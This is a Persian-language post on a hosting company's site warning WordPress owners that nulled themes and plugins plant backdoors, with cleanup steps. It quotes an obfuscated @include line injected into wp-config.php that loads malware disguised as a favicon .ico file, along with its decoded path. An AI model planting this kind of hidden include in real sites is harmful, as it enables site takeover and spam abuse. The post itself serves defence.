هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی - سرورمجازی هلند -سرور مجازی ایران - سرور اختصاصی - هاستینگ| نوین وی پی اس

فروش ویژه هاستینگفروش ویژه نمایندگی هاستینگسرور مجازی آلمان SSD طراحی و توسعه وبسایت
1 2 3 4
نوین وی پی اس ارایه دهنده بهترین سرویس ها ( سرور مجازی ، هاست و ... ) از معتبرترین دیتاسنتر های اروپایی ، با 7 سال سابقه درخشان

مجموعه نوین وی پی اس از سال 1389 به صورت حرفه ای فعالیت خود را در زمینه ارائه خدمات میزبانی وب و فروش سرور مجازی و اختصاصی اغاز نموده و تا الان توانسته توجه بیشماری از کاربران دنیای مجازی را به خود جلب کند و همچنین توانسته است همواره رضایت مستمر ان ها را داشته باشد. این تیم موفق تشکیل شده از بهترین ومجرب ترین تیم مدیریتی و کادر فنی. که همین امر موجب شده است نامی پراوازه در عرصه اینترنت و تجارت الکترونیک از خود به جای گذارد .

logo-samandehi
هشدار ۱۰۰ درصد خطرناک برای دارندگان سایت وردپرسی


هشدار ۱۰۰ درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
– چند مدیریت برای خویش فعال می کنند
– با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنن:

@include  "x2fhx6fmx65/x6eax67hx61sx68yx2fpx75bx6cix63_x68tx6dl  x2fwx70-x63ox6etx65nx74/x75px6cox61dx73/x66ax76ix63ox6e_x399x33cx36ax2eix63o";

که دیکد آن چنین می شود:

@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند …..

حال چطور این طور سایت ها را رفع مشکل کنیم
۱- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
۲- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
۳- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
۴- سطح فایل کانفیگ را ۴۴۴ قرار می دهیم
۵- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
۶- بر روی پوشه مدیریت پسورد می گذاریم
۷- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی

نوشته هشدار ۱۰۰ درصد خطرناک برای دارندگان سایت وردپرسی اولین بار در وان سرور | هاست | سرور مجازی | سرور اختصاصی | ثبت دامین پدیدار شد.

شرکت ارتباط پارسه خلیج فارس NovinVPS.COM

لینک منبع


کلیه حقوق برای مجموعه نوین وی پی اس محفوظ می باشد .